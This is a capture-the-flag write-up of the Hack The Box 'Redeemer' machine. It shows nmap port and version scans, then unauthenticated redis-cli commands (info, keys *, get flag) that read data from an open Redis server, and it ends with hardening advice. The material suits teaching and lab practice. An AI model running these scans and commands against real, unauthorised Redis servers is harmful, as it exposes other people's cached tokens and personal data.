Redeemer — Starting Point Tier 0

First box on the 4ntar3s log. Redeemer is a Tier 0 Starting Point machine — no exploitation chain, no privesc, just a single misconfigured service. The lesson here isn’t the hack, it’s the habit: enumerate fully before you touch anything.

Recon

Two-stage nmap. Fast full-port sweep first, then deep service detection on what comes back.

1

nmap -p- --min-rate 5000 -oN sweep.txt 10.129.x.x

A single port answers:

1
2

PORT     STATE SERVICE
6379/tcp open  redis

Then version detection on that one port:

1

nmap -p6379 -sCV -oN deep.txt 10.129.x.x

1

6379/tcp open  redis  Redis key-value store 5.0.7

Redis 5.0.7, wide open. No TLS, no obvious auth banner.

Enumeration

Connect directly with the Redis CLI:

1

redis-cli -h 10.129.x.x

No password prompt — that’s the whole vulnerability. An internet-reachable Redis with default config trusts every client. Pull server info to confirm the foothold:

1

10.129.x.x:6379> info

Look for the keyspace section. There’s a populated database, which means there are keys worth reading.

Exploitation

Select the database and list everything in it:

1
2
3

10.129.x.x:6379> select 0
10.129.x.x:6379> keys *
1) "flag"

One key named flag. Read it:

1

10.129.x.x:6379> get flag

That’s the box. No shell needed — the data layer was exposed directly.

Loot

The flag drops straight out of the keyspace.

Takeaway: Redis binds to all interfaces by default in old configs and ships with no authentication. In the real world this is how internal caches leak session tokens and PII. The fix is bind 127.0.0.1 plus requirepass. The methodology lesson is what carries forward: the two-stage nmap pattern and “enumerate before you exploit” are the same on every box from here to OSCP.